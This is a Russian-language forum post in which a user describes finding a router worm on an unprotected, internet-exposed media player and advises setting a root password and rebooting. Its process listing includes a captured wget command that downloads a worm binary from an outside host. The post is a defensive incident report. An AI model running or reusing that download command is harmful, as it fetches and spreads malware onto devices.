Добрый (ну или не очень) вечер всем!
Сегодня я наблюдал очень интересную картинку на плеере, выставленном в инет:
- | +
top
last pid: 20087; load avg: 0.80, 0.94, 0.61; up 0+01:41:04 19:58:29
214 processes: 3 running, 210 sleeping, 1 zombie
CPU states: 4.7% user, 0.0% nice, 21.5% system, 73.8% idle, 0.0% iowait
Memory: 111M used, 7268K free, 92K buffers, 5712K cached
Swap: 32K free
PID USERNAME PRI NICE SIZE RES STATE TIME WCPU CPU COMMAND
2447 root 22 0 3400K 1668K sleep 0:32 4.97% 6.34% mipsel
2439 root 15 0 3400K 1668K sleep 0:13 2.05% 3.62% mipsel
19959 root 16 0 1768K 468K run 0:00 17.08% 3.62% top
19999 root 18 0 3400K 1668K sleep 0:00 0.03% 1.81% mipsel
244 root -2 0 802M 4564K sleep 0:00 0.02% 0.91% RPC_thread_V
20077 root 23 0 3400K 1668K sleep 0:00 0.02% 0.91% mipsel
20087 root 23 0 3400K 1668K sleep 0:00 0.02% 0.91% mipsel
20065 root 22 0 3400K 1668K sleep 0:00 0.02% 0.91% mipsel
20039 root 19 0 3400K 1668K sleep 0:00 0.02% 0.91% mipsel
20014 root 18 0 3400K 1668K sleep 0:00 0.02% 0.91% mipsel
19974 root 17 0 3400K 1668K sleep 0:00 0.02% 0.91% mipsel
19977 root 17 0 3400K 1668K sleep 0:00 0.02% 0.91% mipsel
161 root 15 0 802M 4564K sleep 1:07 1.11% 0.00% MAIN
17 root 15 0 0K 0K sleep 0:39 0.65% 0.00% eth0
238 root 26 10 21M 2604K sleep 0:24 0.39% 0.00% php
Посмотрев процессы, я обнаружил там
- | +
16211 root 272 S wget -c http://cosini.uk.to/ppc -P /var/run
16584 root 1452 S /var/run/mipsel
16585 root 1452 S /var/run/mipsel
16586 root 1452 S /var/run/mipsel
16587 root 1452 S /var/run/mipsel
16588 root 1452 S /var/run/mipsel
16589 root 1452 S /var/run/mipsel
16590 root 1292 S /var/run/mipsel
16591 root 1292 S /var/run/mipsel
16592 root 1292 S /var/run/mipsel
16593 root 1292 S /var/run/mipsel
16594 root 1292 S /var/run/mipsel
16595 root 1292 S /var/run/mipsel
Глянул на место, откуда запускалось:
- | +
~ # ls /tmp/run -l
-rwxr-xr-x 1 root root 202192 Mar 4 12:52 arm
-rwxr-xr-x 1 root root 262109 Mar 4 12:52 mips
-rwxr-xr-x 1 root root 266266 Mar 4 12:52 mipsel
-rwxr-xr-x 1 root root 194823 Mar 4 12:52 ppc
-rwxr-xr-x 1 root root 179576 Mar 4 12:52 sh
Итак, перед нами роутерный червь для линуксовых прошивок, который умеет запускаться на вышеперечисленных процессорах. Увы, но наш плеер в их числе.
Пока этот червь не делает никаких деструктивных действий, потому что просто не знает (пока) данную конфигурацию. Единственный вред - нагружает процессор и сеть. Но это только до той поры, пока хозяин червя не знает, что появилась новая ниша для распространения.
Бороться с червём достаточно просто:
не выставляйте незапароленные плеера в интернет!Если всё-таки это нужен внешний доступ к плееру - установите модуль
parole и задайте рутовый пароль! Особенно это относится к плеерам, подключенным напрямую к провайдеру и, возможно, через ppp соединение.
Если вы всё-таки поймали трояна (симптомы - тормоза, зависания, mipsel в процессах) - просто перегрузите плеер.
Не распространяйте заразу - предохраняйтесь!